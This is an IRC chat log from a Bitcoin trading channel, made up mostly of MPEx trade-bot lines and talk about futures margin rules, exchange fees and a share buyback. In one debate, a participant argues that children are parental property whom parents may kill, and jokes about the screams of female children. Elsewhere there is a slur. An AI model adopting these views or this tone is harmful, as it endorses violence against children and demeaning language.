margin then. all positions = wiped. Dec 14 09:10:05 yes but that is known and predictable Dec 14 09:10:15 but then we could just have a single 3 month contract that resets Dec 14 09:10:16 no need for 4 Dec 14 09:10:17 from the current diff level at the settlement date Dec 14 09:10:39 Yes, but if the government discharge a kid from the public system and returns it to it's parents... Wouldn't we consider that parents chose to be responsible? If they can't beat the life out of it/put it in a grinder, they have to do something with it. Dec 14 09:10:51 Namjies who says they can;t ? Dec 14 09:12:50 Hmm, why could they? Dec 14 09:13:38 their kid, their problem. Dec 14 09:14:52 If any parent can, then idiots would be permitted to kill their productive child be interpreting the child correcting their erros as disrespect. They could even kill him just because they feel like it. Dec 14 09:15:20 [MPEX] [S.MPOE] 15704 @ 0.00061336 = 9.6322 BTC [-] Dec 14 09:15:37 sure. Dec 14 09:15:47 it comes with it being THEIR kid Dec 14 09:15:52 not yours and not the state's. Dec 14 09:15:57 Well there are other variations, like a margin level that is adjusted for all asset creators that reflects the mean of the margin requirements of the population of contracts at time each was struck. This current liquidation value could be displayed on the contract trading page. Dec 14 09:16:08 it would then adjust in a smooth manner Dec 14 09:16:26 but someone could trigger liquidation with a large order Dec 14 09:16:32 so basically, display the mean collateral per contract ? Dec 14 09:16:35 If kids are property, then every human is property. Dec 14 09:16:42 ya i was gonna say, that's risky. Dec 14 09:16:51 Namjies kids aren't people yet. Dec 14 09:16:56 if they are, then they can fuck and have a beer Dec 14 09:17:00 And as such, if a couple wants slaves, they can manufacture them. Dec 14 09:17:17 if they can't legally have a beer, then don't tell me they're people. Dec 14 09:17:54 and the entire history of positive pop growth over millenia was exactly it : manufacturing slaves. Dec 14 09:18:02 take that away you get negative pop growth Dec 14 09:18:29 Well. I gotta sleep. I have put some trial contracts out for sale. If they don't sell by next Weds, I wonder if potential buyers will understand that the contract is not an auto loss for them at my ask. Dec 14 09:18:35 Ah, so being legally allowed to have beer makes humans humans now? That's probably one of the weakest argument I've ever heard you say. Dec 14 09:19:13 Bugpowder why autoloss ? Dec 14 09:19:18 it's 9x innit ? Dec 14 09:19:20 It's not like you would believe the state can choose who can or cannot drink? That doesn't sound like you. Dec 14 09:19:24 ;;calc 2.9**3 * 33 Dec 14 09:19:24 804.837 Dec 14 09:19:26 yes Dec 14 09:19:31 o just 80 Dec 14 09:19:36 but next week Dec 14 09:19:57 people will think that any price over .097 is autoloss for MAR Dec 14 09:19:57 Namjies yes, if you don't recognise them some rights then they're slaves. Dec 14 09:20:07 due to the new collatoral reqs Dec 14 09:20:16 for new contracts Dec 14 09:20:28 Bugpowder an important point here is that i would imagine actual margins being blown to be rare. Dec 14 09:20:33 do you think not so ? Dec 14 09:20:41 ha Dec 14 09:20:50 i do Dec 14 09:21:05 but many people are more optimistic about ASICs than I Dec 14 09:21:11 and they are my potential customers Dec 14 09:21:19 this is a point. Dec 14 09:22:13 Hmm, well I don't approve of persons having sovereignty over life and death of any human being, even kids. Dec 14 09:22:31 Namjies me either, but the fact remains once you strip humans of some rights you can't pretend they're still humans. Dec 14 09:22:49 they're not. so, either kids can do what they please or else they're slaves. no synthetic middle of the road so we can argue both ways Dec 14 09:24:23 Well, yes, I would still do. It depends on what you consider "human" however. I'm using it refering to the specy. Dec 14 09:24:33 Not their legal/rights status. Dec 14 09:24:39 i was using it in the social participation sense. citizen. Dec 14 09:24:45 [MPEX] [S.DICE] 887 @ 0.00336178 = 2.9819 BTC [-] Dec 14 09:24:47 [MPEX] [S.DICE] 800 @ 0.00333874 = 2.671 BTC [-] Dec 14 09:24:48 [MPEX] [S.DICE] 346 @ 0.00332218 = 1.1495 BTC [-] Dec 14 09:25:10 That's not what the law says.. Dec 14 09:25:10 Well I suppose they are indeed not really citizens. Dec 14 09:25:20 Kids have fundamental rights, and can sue for emancipation. Dec 14 09:25:55 They are only not citizens insofar as they can't vote and aren't held responsible for their own actions. Dec 14 09:26:16 But they do have human rights which are inalienable regardless of how old they are. Dec 14 09:26:27 midnightmagic we're discussing the philosophy of it rather than the practice. Dec 14 09:26:35 Even so. Dec 14 09:26:45 even so what ? you can't have half a whole apple. Dec 14 09:26:54 either it's whole or else it's not. Dec 14 09:27:26 You treat them the same way tho, wether they're half or whole. You treat it as food. Dec 14 09:27:32 I eat half an apple all the time. Dec 14 09:27:57 but how you treat something speaks to you Dec 14 09:27:59 not to the thing. Dec 14 09:28:41 hence the distinction between practical (how society treats them) and philosophical (what they are) Dec 14 09:29:03 Consensus is a pretty powerful thing. Children are incapacitated people, until they either come into their responsibility, or prove they have it early. Dec 14 09:29:17 consensus is a pretty socialist thing. Dec 14 09:29:25 Consensus is what society is. Dec 14 09:29:28 truth is not something that is arrived at by consensus, nor is value. Dec 14 09:29:39 Reality is though. Dec 14 09:29:47 nope, reality is not either. Dec 14 09:29:56 and yes, consensus is society, which is what makes it dirty. Dec 14 09:29:59 as a concept. Dec 14 09:30:23 If you have 99 people in a room repeating the same thing, the final will, 30% or so of the time, believe it too, even if their eyes tell them differently. Asche's conformity tests. Dec 14 09:30:27 [MPEX] [S.MPOE] 9786 @ 0.00061336 = 6.0023 BTC [-] Dec 14 09:30:28 [MPEX] [S.MPOE] 464 @ 0.00061 = 0.283 BTC [-] Dec 14 09:30:29 So, yes, even reality is consensus. Dec 14 09:30:40 midnightmagic no. the social representation of reality is consensus Dec 14 09:30:45 which is just a little more circularity. Dec 14 09:31:08 When I say "reality" I mean, "What a single human believes is reality." Not the objectively measurable thing itself. Dec 14 09:31:13 the romans were in agreement that they kick ass, just as odoacer marched in. Dec 14 09:31:28 consensus is in general the best tool to identify when you're about to get fucked. Dec 14 09:31:29 But if society is not based on consensus, on what do you propose it be based? Dec 14 09:32:02 Namjies i do not propose society not be based on consensus. i just say we need to understand thinking is an anterior, more important thing than society. Dec 14 09:32:02 [MPEX] [S.MPOE] 4321 @ 0.00061016 = 2.6365 BTC [+] Dec 14 09:32:03 [MPEX] [S.MPOE] 1386 @ 0.00061 = 0.8455 BTC [-] Dec 14 09:32:04 [MPEX] [S.MPOE] 11393 @ 0.00060668 = 6.9119 BTC [-] Dec 14 09:32:14 Quite. Dec 14 09:32:26 and so what society does has no bearing on the thinking side of things. Dec 14 09:32:43 That would be a rationalist's point of view. Unfortunately most humans are not rationalists. Dec 14 09:33:00 well... so ? Dec 14 09:33:23 i mean, "society" was in consensus earth is the center of the universe. lalala, big deal. Dec 14 09:33:28 society is here mostly to amuse. Dec 14 09:34:03 But similarly, if consensus is required, how could someone have rights over life and death of another individual, even if only a child? Dec 14 09:34:23 Namjies i don't propose that. i am just pointing out the inconsistency involved. Dec 14 09:34:24 Reality is not governed immediately by rational thinking, neither society. Thus, consensus by mass hallucination is what society arises from; more's the pity when the masses have already accepted a certain lesser reality as truth prior to it becoming enshrined in law. Dec 14 09:35:06 midnightmagic well if female children are screaming bloody murder... Dec 14 09:35:14 :P Dec 14 09:35:21 Lots of heat, lots of power consumed in there.. Dec 14 09:35:37 with giant open-air vents to the outside, and lots of noise at the neighbour's place. Dec 14 09:35:43 [MPEX] [S.MPOE] 4321 @ 0.00061568 = 2.6604 BTC [+] Dec 14 09:35:44 [MPEX] [S.MPOE] 7461 @ 0.000616 = 4.596 BTC [+] Dec 14 09:35:46 [MPEX] [S.MPOE] 2128 @ 0.00061647 = 1.3118 BTC [+] Dec 14 09:35:53 why not just get a spot on an industrial zone like sane people Dec 14 09:36:10 Ah. Here, I am simply considering the benefits of protecting individuals on which harm is done. (and not helping someone is not harming him) Dec 14 09:36:24 Namjies not helping someone is not harming him. Dec 14 09:36:40 That's exactly what I said. Dec 14 09:36:43 and i agree. Dec 14 09:36:49 I'm pretty sure we have achieved a matched set of priors. :) Dec 14 09:36:55 And for those requesting help, consider case by case wether to or not. Dec 14 09:36:58 (narrowly) Dec 14 09:37:21 but in principle, the problem with society is this : no 100% solution will ever exist. so, in general, we need to understand and accept that some kids will get raped, some people will get shot etc. trying to make a system where these are impossible results in an unworkable system Dec 14 09:37:26 they just need to be unproductive. Dec 14 09:37:48 It is often beneficial to help kins if they don't live from your help. Dec 14 09:37:52 Harm minimization works wonders.. Dec 14 09:38:08 i agree. Dec 14 09:38:28 and i help people all the time. the catch is that i never help people in systematic ways. Dec 14 09:38:43 taxes are bs, nickle to panhandler is bs, tithe in church is bs, these are failure modes. Dec 14 09:39:01 Ah, but perfection is never achievable. Should we not strive for it as much as possible regardless? Dec 14 09:39:06 you gotta double your dime with at least a dime's worth of your intelligence. Dec 14 09:39:11 I try to help people.. Dec 14 09:39:22 I have to find a better way to do it. Dec 14 09:39:25 midnightmagic here's an anecdote for you : Dec 14 09:39:28 But yes, people should not be systematically helped, on that I agree. Dec 14 09:39:58 there's very nice farmer markets here. i bought 56 lei worth of smoked cheeses and other nice stuff. there was a beggar there, when he saw my cashroll he got all excited. Dec 14 09:40:13 so i gave the salesgirl 60 and told her to give the guy food worth of the change Dec 14 09:40:20 which he didn't want! he wanted money! Dec 14 09:40:20 For a long time I just tried to convince them of a better way to think. That doesn't work, basically ever. The last decade or so I've been trying to refine civil human compassion. Dec 14 09:40:22 so she got to keep it. Dec 14 09:40:26 That's not really working so well either. Dec 14 09:40:38 simple game of who gets this euro ? the "needy" or the working ? Dec 14 09:41:22 I am not prepared nor financially capable of providing for basic human needs and wants.. Dec 14 09:41:34 How much is 1 lei worth.. hrm.. Dec 14 09:41:40 like 4 to the euro. Dec 14 09:41:53 LOL course he didn't want huge volumes of food. Dec 14 09:42:03 actually, excellent food here is incredibly cheap Dec 14 09:42:12 a 1 lb chunk of homesmoked, homemade cheese is like 20 Dec 14 09:42:15 That's.. where? Romania right? Dec 14 09:42:18 yeah. Dec 14 09:42:29 one of the main reasons im here. better food than france, about on par wine, 1/10 the prices. Dec 14 09:42:36 $10 for it. That's an okay price, I would pay for that. Dec 14 09:43:01 lol i know people who'd pay 100+ Dec 14 09:43:06 Do you have good meats there? Dec 14 09:43:07 except you can't import it in the us. Dec 14 09:43:13 midnightmagic except beef yeah. Dec 14 09:43:52 I've been trying out some nice smoked meats.. shinckenspeck.. what prosciutto wishes it were. Dec 14 09:43:55 so delicious. Dec 14 09:44:20 hehehe Dec 14 09:44:33 I smoked my own heritage bacon a while back. Did I tell you about that? Dec 14 09:44:38 nope Dec 14 09:44:46 Almost burned my house down. Dec 14 09:44:49 lmao Dec 14 09:45:04 then he wonders why police tries to keep an eye on him Dec 14 09:45:12 midnightpublicmenace Dec 14 09:45:17 If my Dad hadn't the foresight to insist I keep my BBQ as far away from the house, I would be homeless right now. Dec 14 09:45:30 Well. "Homeless." Dec 14 09:45:54 [MPEX] [S.MPOE] 3572 @ 0.00061647 = 2.202 BTC [+] Dec 14 09:45:55 [MPEX] [S.MPOE] 6328 @ 0.00061675 = 3.9028 BTC [+] Dec 14 09:46:08 and actually ima go have some. Dec 14 09:46:16 I ruined the first two sets of pork bellies, and the farmer was so pissed off at me for ruining the mean (even though I'd paid for the damn stuff) she made me butcher the last one myself. Dec 14 09:46:21 Hmm, so we don't really disagree. But at first what you say always seem to point to that your beliefs revolves around an "all for myself" basis where no help/cooperation of any sort is acceptable (and similar with anything else, always seem like an extreme "never".) When in fact you either don't agree with how it's done or how it should be applied or when it's acceptable. Dec 14 09:46:28 if everyone's done dumping the k's of btc on mpex for five minutes Dec 14 09:46:42 Namjies sounds aboutright Dec 14 09:46:47 I often end up wondering, why are we arguing on the topic? Dec 14 09:47:15 Namjies: To reveal and align your priors! :-D Dec 14 09:47:26 Ahah... Dec 14 09:47:44 And then let Aumann's agreement theorem take over! :-) Dec 14 09:50:37 I always wonder if you willingly make your initial statements seem like an extremist "never" to promote discussion or simply for the sake of keeping it short. Dec 14 09:51:54 Oh you mean you and MP specifically. Dec 14 09:58:30 ahh Dec 14 09:58:48 Namjies for the sake of keeping it short Dec 14 09:59:17 and also for the sake of keeping them rare. idiots tend to self-select as they can't cope with it. Dec 14 09:59:30 I would have though so. Dec 14 10:01:05 So... to start another discussion... why was it that you placed such high registration fees on MPEx? Dec 14 10:01:25 because there's no practical way to check people's disposable income. Dec 14 10:01:36 that measure they have irl of qualified investors is pretty smart. Dec 14 10:02:36 And you wanted to keep low cash investors out like the ones on GLBSE. Dec 14 10:03:03 The ones which might have a few shares paid with faucet like websites. Dec 14 10:03:20 i want to keep people unable to meaningfully contribute in the market out of it. Dec 14 10:03:29 meaningfully contribute means of course help with price formation. Dec 14 10:04:15 this has been stated in the inverse, as "keeping drama out" Dec 14 10:04:20 basically it's the same thing Dec 14 10:05:00 [MPEX] [S.MPOE] 4321 @ 0.00060689 = 2.6224 BTC [-] Dec 14 10:05:01 [MPEX] [S.MPOE] 21379 @ 0.00060668 = 12.9702 BTC [-] Dec 14 10:05:41 Ah. But isn't keeping the drama out basically coming out to avoiding certain kind of issued shares like the ones that were allowed on GLBSE? Not the size of investments? Dec 14 10:05:58 i don't think the two are a different thing. Dec 14 10:06:12 [MPEX] [S.MPOE] 900 @ 0.00061169 = 0.5505 BTC [+] Dec 14 10:07:01 [MPEX] [S.MPOE] 3421 @ 0.00061169 = 2.0926 BTC [+] Dec 14 10:07:02 [MPEX] [S.MPOE] 4439 @ 0.00061174 = 2.7155 BTC [+] Dec 14 10:07:09 at the macro level (which is what i do for mpex) you are well advised to use macro tools. a barrier to entry for instance. Dec 14 10:07:19 targeted intervention is usually a bad idea. Dec 14 10:07:46 The way I see it, if they're not good investors, there's not really any incentive to protect them from entering the market. Any purchasing power small or large pressures prices up or down. Dec 14 10:07:55 I suppose this is what coinbr is for tho. Dec 14 10:08:07 for instance, so you understand better that i mean : in the discussion for psychoticboy's asset relisting, mpex got 1 vote, out of like 30. Dec 14 10:08:22 Same as small investors go through a brokerage firm to get a few shares. Dec 14 10:08:25 mpex would never list some asset making 3 btc a month, let alone something as dubious as those were. but it doesn't have to not list it : Dec 14 10:08:31 the people don't want it listed anyway. Dec 14 10:08:34 so it works splendidly. Dec 14 10:09:59 [MPEX] [S.MPOE] 5161 @ 0.00061174 = 3.1572 BTC [+] Dec 14 10:11:14 Well I see the point of not managing low income assets. Not worth the support. However for traders, there's always trading fees. But to avoid providing tech support to them, keep them out with a large fee. Enters coinbr which acts like a brokerage firm. And requires a monthly fee for having an account and higher trading fees. Dec 14 10:11:25 I suppose considering this, it makes a lot of sense. Dec 14 10:11:56 there's nothing wrong with having brokers serving any market niche. irl there's ameritrade and optionsexpress and etc doing online accounts Dec 14 10:12:09 but it has to be brokers serving these markets. Dec 14 10:12:41 Yes. Dec 14 10:12:42 in other words, my core mission still is to equip btc with the weaponry it needs to win the war with fiat. this hasn't and won't change. Dec 14 10:12:47 so just going about that. Dec 14 10:14:23 [MPEX] [S.MPOE] 4321 @ 0.00061432 = 2.6545 BTC [+] Dec 14 10:14:24 [MPEX] [S.MPOE] 7193 @ 0.00061422 = 4.4181 BTC [-] Dec 14 10:15:12 I often forget you want to manage MPEx as a stock exchange and that the fee I paid is actually to get a "seat" of sort. Dec 14 10:15:35 right. Dec 14 10:16:25 if i call it a stock exchange i actually mean the words. Dec 14 10:16:31 i guess that's rare, but still. Dec 14 10:16:53 It's a small fee although the total capitalization on MPEx is also low. If it keeps going to become one of the major stock exchange for Bitcoins, that "seat" would be quite a good value however. Dec 14 10:18:03 it's "small" only in terms of btc fiat value atm. Dec 14 10:18:17 Indeed. Dec 14 10:18:18 otherwise its a 30 units fee on a 20mn total monetary mass. Dec 14 10:18:23 that'd be a 7mn fee in fiat. Dec 14 10:18:29 Eheh Dec 14 10:18:52 so, as btc goes up (and in no small part because of mpex) the fee scales. is perfect-ish Dec 14 10:20:56 [MPEX] [S.MPOE] 4321 @ 0.00061663 = 2.6645 BTC [+] Dec 14 10:20:58 [MPEX] [S.MPOE] 22963 @ 0.00061675 = 14.1624 BTC [+] Dec 14 10:23:28 [MPEX] [X.EWTI] 500 @ 0.0614575 = 30.7288 BTC [-] Dec 14 10:23:45 I still disapprove of MPEx not having it's own domain however. Especially because of the dtng board kept on same domain. Although I don't mind it, I know many people with large capital and qualified to participate will be repulsed by that fact. If you recall stating some were more sensitive on the topic in other cultures, like in America, or something to that effect. Dec 14 10:23:53 anyway. total cap on mpex (stocks only) is just about to breach 1mn btc. Dec 14 10:23:59 that's not low by any standards Dec 14 10:24:00 [MPEX] [S.MPOE] 2609 @ 0.00061675 = 1.6091 BTC [+] Dec 14 10:24:01 [MPEX] [S.MPOE] 10100 @ 0.00061755 = 6.2373 BTC [+] Dec 14 10:24:02 [MPEX] [S.MPOE] 2580 @ 0.00061834 = 1.5953 BTC [+] Dec 14 10:24:15 in fact this is the first online thing of that level. never before was a stock exchange ever had this Dec 14 10:25:12 Namjies i actually was planning to both sell dtng and move mpex Dec 14 10:25:46 Hmm, I would find it interesting to see how people would react to that change. Dec 14 10:26:10 :p Dec 14 10:26:55 the beauty of how it's designed tho, is that i can run it symultaneously of multiple domains Dec 14 10:27:03 and servers. i don't mean mirror it, i mean actually run it. Dec 14 10:27:40 Ah. Interesting. Dec 14 10:28:30 there's no difference between two diff people loading http://polimedia.us/bitcoin/mpex.php in their browser and two or the same loading site1/site2 sorta thing Dec 14 10:28:48 Well multiple domain isn't hard. Multiple servers shouldn't be too much hassle either with current cloud/cluster services and virtualization capabilities. Dec 14 10:29:15 Although it does require work. Dec 14 10:29:19 Hmm. Dec 14 10:29:23 i wouldn't use the cloud. Dec 14 10:29:28 i dun trust it. Dec 14 10:29:43 [MPEX] [S.MPOE] 7650 @ 0.00061834 = 4.7303 BTC [+] Dec 14 10:31:04 Not quite developed yet. Plus there's data safety concerns using a public cloud. Private cloud would be useful if you need to provide cloud like services for elastic subprojects. Otherwise, for your needs alone for one project, a cluster. Dec 14 10:31:54 [MPEX] [S.MPOE] 1820 @ 0.00061834 = 1.1254 BTC [+] Dec 14 10:31:54 [MPEX] [S.MPOE] 10200 @ 0.00061877 = 6.3115 BTC [+] Dec 14 10:31:56 [MPEX] [S.MPOE] 1680 @ 0.00061914 = 1.0402 BTC [+] Dec 14 10:33:05 I also want to see what bitcointalk's trolls would then find to it. Other than that you're romanian. Complaining based on nationality... Dec 14 10:33:16 lol. Dec 14 10:33:24 it was a fine exercise so far, wasn't it. Dec 14 10:33:32 anyway, im off to town for a little. catch you later a bit. Dec 14 10:33:35 That the fee is too damn high would probably be the only remaining complaint. Dec 14 10:33:43 Well goodbye then. Dec 14 10:42:56 [MPEX] [S.MPOE] 9420 @ 0.00061914 = 5.8323 BTC [+] Dec 14 10:42:58 [MPEX] [S.MPOE] 6730 @ 0.00061916 = 4.1669 BTC [+] Dec 14 10:46:52 [MPEX] [S.MPOE] 3600 @ 0.00061549 = 2.2158 BTC [-] Dec 14 10:50:36 [MPEX] [S.MPOE] 808 @ 0.00061916 = 0.5003 BTC [+] Dec 14 10:50:36 [MPEX] [S.MPOE] 4992 @ 0.00061923 = 3.0912 BTC [+] Dec 14 10:52:22 [MPEX] [S.MPOE] 721 @ 0.00061549 = 0.4438 BTC [-] Dec 14 10:52:23 [MPEX] [S.MPOE] 15829 @ 0.00061514 = 9.7371 BTC [-] Dec 14 10:58:20 [MPEX] [S.MPOE] 4321 @ 0.00061909 = 2.6751 BTC [+] Dec 14 10:58:21 [MPEX] [S.MPOE] 6208 @ 0.00061923 = 3.8442 BTC [+] Dec 14 10:58:23 [MPEX] [S.MPOE] 5871 @ 0.00061952 = 3.6372 BTC [+] Dec 14 11:02:22 [MPEX] [S.MPOE] 7013 @ 0.00061952 = 4.3447 BTC [+] Dec 14 11:02:23 [MPEX] [S.MPOE] 3400 @ 0.0006198 = 2.1073 BTC [+] Dec 14 11:02:25 [MPEX] [S.MPOE] 10376 @ 0.00062079 = 6.4413 BTC [+] Dec 14 11:03:52 [MPEX] [S.MPOE] 4321 @ 0.00061536 = 2.659 BTC [-] Dec 14 11:03:52 [MPEX] [S.MPOE] 5371 @ 0.00061514 = 3.3039 BTC [-] Dec 14 11:03:54 [MPEX] [S.MPOE] 17230 @ 0.00061422 = 10.583 BTC [-] Dec 14 11:10:44 [MPEX] [S.MPOE] 416 @ 0.00061422 = 0.2555 BTC [-] Dec 14 11:10:44 [MPEX] [S.MPOE] 1850 @ 0.00061321 = 1.1344 BTC [-] Dec 14 11:18:35 [MPEX] [S.MPOE] 3597 @ 0.00060815 = 2.1875 BTC [-] Dec 14 11:22:18 [MPEX] [S.MPOE] 4321 @ 0.00062075 = 2.6823 BTC [+] Dec 14 11:22:19 [MPEX] [S.MPOE] 2274 @ 0.00062079 = 1.4117 BTC [+] Dec 14 11:22:20 [MPEX] [S.MPOE] 8392 @ 0.00062132 = 5.2141 BTC [+] Dec 14 11:22:21 [MPEX] [S.MPOE] 762 @ 0.00062188 = 0.4739 BTC [+] Dec 14 11:33:34 [MPEX] [S.MPOE] 5188 @ 0.00062188 = 3.2263 BTC [+] Dec 14 11:33:35 [MPEX] [S.MPOE] 2350 @ 0.00062197 = 1.4616 BTC [+] Dec 14 11:33:36 [MPEX] [S.MPOE] 2612 @ 0.00062222 = 1.6252 BTC [+] Dec 14 11:41:38 [MPEX] [S.DICE] 1442 @ 0.00332218 = 4.7906 BTC [-] Dec 14 11:45:19 [MPEX] [S.MPOE] 6700 @ 0.00062222 = 4.1689 BTC [+] Dec 14 11:50:44 [MPEX] [S.MPOE] 22750 @ 0.00062197 = 14.1498 BTC [-] Dec 14 11:50:45 [MPEX] [S.MPOE] 2000 @ 0.00061875 = 1.2375 BTC [-] Dec 14 11:52:43 I need to quit sleeping so much Dec 14 11:52:52 lol Dec 14 11:52:54 u were asleep again? Dec 14 11:53:16 you should look at https://bitcointalk.org/index.php?topic=130754.0 ... :P Dec 14 11:53:42 Ukto: meh, I dunno Dec 14 11:53:50 lol Dec 14 11:53:58 I just didnt feel like being awake again Dec 14 11:54:11 i know that feeling Dec 14 11:54:36 wokring from home, and keeping my own schedual.. sometimes you just want another day to pass by before getting back up Dec 14 11:55:05 schedule* Dec 14 11:56:47 Ukto: btw, re: that bitfunder thread Dec 14 11:56:51 shouldnt that be 4 slots? Dec 14 11:56:59 dmc already took the first one I thought Dec 14 11:57:03 LOL Dec 14 11:57:28 Put it in the thread and I'll mark it down. ;) Dec 14 11:58:58 [MPEX] [S.MPOE] 2900 @ 0.00061875 = 1.7944 BTC [-] Dec 14 12:01:13 [MPEX] [S.MPOE] 15831 @ 0.00061875 = 9.7954 BTC [-] Dec 14 12:01:14 [MPEX] [S.MPOE] 8700 @ 0.00061872 = 5.3829 BTC [-] Dec 14 12:01:16 [MPEX] [S.MPOE] 10849 @ 0.00060876 = 6.6044 BTC [-] Dec 14 12:07:21 wow, gald you put alot of details for ppl :P Dec 14 12:07:28 you make a great example. :P Dec 14 12:07:33 I guess I will fill it in for you Dec 14 12:08:31 Ukto: I approach forums the way I approach perl Dec 14 12:09:01 "My understanding is the plan for DMC to continue trading and paying out dividends and plan to try to buy back the shares over time. Right?" Dec 14 12:09:16 Diablo-D3: As little interaction as possible? Dec 14 12:09:17 :P Dec 14 12:09:22 bingo Dec 14 12:09:27 Ukto: and no, no paying of dividends Dec 14 12:09:42 [MPEX] [S.MPOE] 9222 @ 0.00060876 = 5.614 BTC [-] Dec 14 12:09:46 0,o Dec 14 12:10:16 Will the shares be worth anyone else really buying then? Dec 14 12:10:31 depends entirely how much they pay for them Dec 14 12:10:43 I guess thats true... Dec 14 12:11:58 if you take the first half of shares I bought back as an aggregate, people made back more than they originally invested already Dec 14 12:12:38 ah Dec 14 12:14:16 not all shares were sold for 1BTC, even though that was originally the plan and trolls keep bringing that up Dec 14 12:14:30 DMC raised closer to 2k, not 20k Dec 14 12:14:44 sucks :/ Dec 14 12:15:00 well, the market was shitting itself and I was trying to get a much larger stake of it Dec 14 12:15:05 in the end nobody won Dec 14 12:15:21 you should pass my troll tag idea to theymos... Let ppl donate btc towards people getting TROLL tagged... if it hits 10btc they get tagged... :P Dec 14 12:15:37 10? try 50. Dec 14 12:15:41 no Dec 14 12:15:47 50 gets you Super Troll Dec 14 12:15:52 100 is Epic Troll Dec 14 12:15:59 fuck, I'd be epic troll by the end of the week Dec 14 12:16:06 :P Dec 14 12:16:12 see? would make theymos happy Dec 14 12:16:13 LOL Dec 14 12:16:26 but I'm a forum mod :< Dec 14 12:17:14 told psycho he needs to set his title to 'Staff Troll' Dec 14 12:17:14 :P Dec 14 12:17:29 or Troll Moderator Dec 14 12:17:38 could mean either way Dec 14 12:17:38 :P Dec 14 12:18:07 for the discussion boards I am putting on BF... I am requirng ppl to have a linked weex account to post. :P Dec 14 12:18:21 (most will need that anyways) Dec 14 12:23:19 oh Dec 14 12:23:35 did you already tell the shareholders there would be no divvies paid out? Dec 14 12:23:51 can already imagine ppl throwing a fit if not Dec 14 12:24:44 [MPEX] [S.MPOE] 929 @ 0.00060876 = 0.5655 BTC [-] Dec 14 12:24:45 [MPEX] [S.MPOE] 7703 @ 0.00060668 = 4.6733 BTC [-] Dec 14 12:26:57 thats how it was for the first half of the buyback right? Dec 14 12:30:49 [MPEX] [S.MPOE] 4863 @ 0.00060913 = 2.9622 BTC [+] Dec 14 12:30:50 [MPEX] [S.MPOE] 14554 @ 0.00061902 = 9.0092 BTC [+] Dec 14 12:30:52 [MPEX] [S.MPOE] 1183 @ 0.00062222 = 0.7361 BTC [+] Dec 14 12:31:10 ahh, guess the buyback started the day before/of the shutdown, or therebouts Dec 14 12:31:19 *Reading thread*.. dont see anything about no divs.. :/ Dec 14 12:31:33 still reading tho Dec 14 12:33:39 [MPEX] [S.MPOE] 13205 @ 0.00062222 = 8.2164 BTC [+] Dec 14 12:33:40 [MPEX] [S.MPOE] 9822 @ 0.00062241 = 6.1133 BTC [+] Dec 14 12:33:40 [MPEX] [S.MPOE] 3073 @ 0.00062256 = 1.9131 BTC [+] Dec 14 12:38:13 [MPEX] [S.MPOE] 4479 @ 0.00060668 = 2.7173 BTC [-] Dec 14 12:42:55 [MPEX] [S.MPOE] 12796 @ 0.00060668 = 7.7631 BTC [-] Dec 14 12:42:57 [MPEX] [S.MPOE] 22404 @ 0.00060667 = 13.5918 BTC [-] Dec 14 12:47:20 [MPEX] [S.MPOE] 4196 @ 0.00060667 = 2.5456 BTC [-] Dec 14 12:47:21 [MPEX] [S.MPOE] 18450 @ 0.00060488 = 11.16 BTC [-] Dec 14 12:47:22 [MPEX] [S.MPOE] 18204 @ 0.00060371 = 10.9899 BTC [-] Dec 14 13:02:03 [MPEX] [S.MPOE] 15100 @ 0.00060966 = 9.2059 BTC [+] Dec 14 13:06:51 https://bitcointalk.org/index.php?topic=130795.0 Dec 14 13:06:53 bam Dec 14 13:07:04 Ukto: yes, they're already aware of no dividends Dec 14 13:07:57 there was a shareholder vote on it to do it for a limited time, then nefario locked my glbse account and tried to use his attempted removal of me as ceo as a cover for his bullshit Dec 14 13:08:36 Ukto: theres no dividends to pay anyhow Dec 14 13:08:55 dividends were generated from the mining assets we had while I was trying to save up the money to kick off the rest of the plan Dec 14 13:09:33 ever since glbse went down, no one has been able to pay dividends Dec 14 13:09:37 thus, theres no dividends to pay Dec 14 13:15:52 ah Dec 14 13:17:02 Diablo-D3: https://bitcointalk.org/index.php?topic=102181.msg1399421#msg1399421 Dec 14 13:17:05 0,0 Dec 14 13:18:34 er, what am I reading? Dec 14 13:20:51 oh, er Dec 14 13:21:04 was just my comments on somoene moaning over BF's tos Dec 14 13:21:22 which is the only one that hhas a promise to the users, instead of nothing at all Dec 14 13:22:03 heh Dec 14 13:22:27 its like star wars.. lets vote for to turn the republic into an empire! yay! Dec 14 13:22:28 ... Dec 14 13:22:36 it sounds prettier! Dec 14 13:22:36 :P Dec 14 13:24:31 anyhow Dec 14 13:24:43 I think luke'll shut up now Dec 14 13:26:42 fucking retard Dec 14 13:29:08 [MPEX] [S.MPOE] 4300 @ 0.00060969 = 2.6217 BTC [+] Dec 14 13:29:43 gl with that Diablo-D3 :) Dec 14 13:31:56 I think I need food Dec 14 13:32:25 all this countertrolling (ie, countering of trolls) has made me hungry Dec 14 13:33:09 amended: "Also, I noticed that you have never posted in the GSDPT thread before, other than to +1 btct. It just made me curious if you happen to own any shares of GSDPT?" Dec 14 13:33:11 -_- Dec 14 13:33:25 i think thats what I just did. countertrolled Dec 14 13:33:45 [MPEX] [S.MPOE] 2250 @ 0.00060966 = 1.3717 BTC [-] Dec 14 13:33:47 [MPEX] [S.MPOE] 10696 @ 0.00060578 = 6.4794 BTC [-] Dec 14 13:38:14 [MPEX] [S.MPOE] 5918 @ 0.00060578 = 3.585 BTC [-] Dec 14 13:38:15 [MPEX] [S.MPOE] 696 @ 0.00060371 = 0.4202 BTC [-] Dec 14 13:38:16 [MPEX] [S.MPOE] 8931 @ 0.0006027 = 5.3827 BTC [-] Dec 14 13:38:18 [MPEX] [S.MPOE] 1655 @ 0.00060257 = 0.9973 BTC [-] Dec 14 13:42:39 [MPEX] [S.MPOE] 3428 @ 0.00060969 = 2.09 BTC [+] Dec 14 13:42:40 [MPEX] [S.MPOE] 9000 @ 0.00061451 = 5.5306 BTC [+] Dec 14 13:46:27 [MPEX] [S.MPOE] 9772 @ 0.00061639 = 6.0234 BTC [+] Dec 14 14:03:03 [MPEX] [S.MPOE] 3172 @ 0.00060734 = 1.9265 BTC [-] Dec 14 14:04:35 [MPEX] [S.MPOE] 14400 @ 0.00060729 = 8.745 BTC [-] Dec 14 14:04:36 [MPEX] [S.MPOE] 2250 @ 0.0006066 = 1.3649 BTC [-] Dec 14 14:06:09 [MPEX] [S.MPOE] 39756 @ 0.00060734 = 24.1454 BTC [+] Dec 14 14:06:10 [MPEX] [S.MPOE] 9742 @ 0.0006179 = 6.0196 BTC [+] Dec 14 14:06:12 [MPEX] [S.MPOE] 14027 @ 0.00062256 = 8.7326 BTC [+] Dec 14 14:06:13 [MPEX] [S.MPOE] 7075 @ 0.00062258 = 4.4048 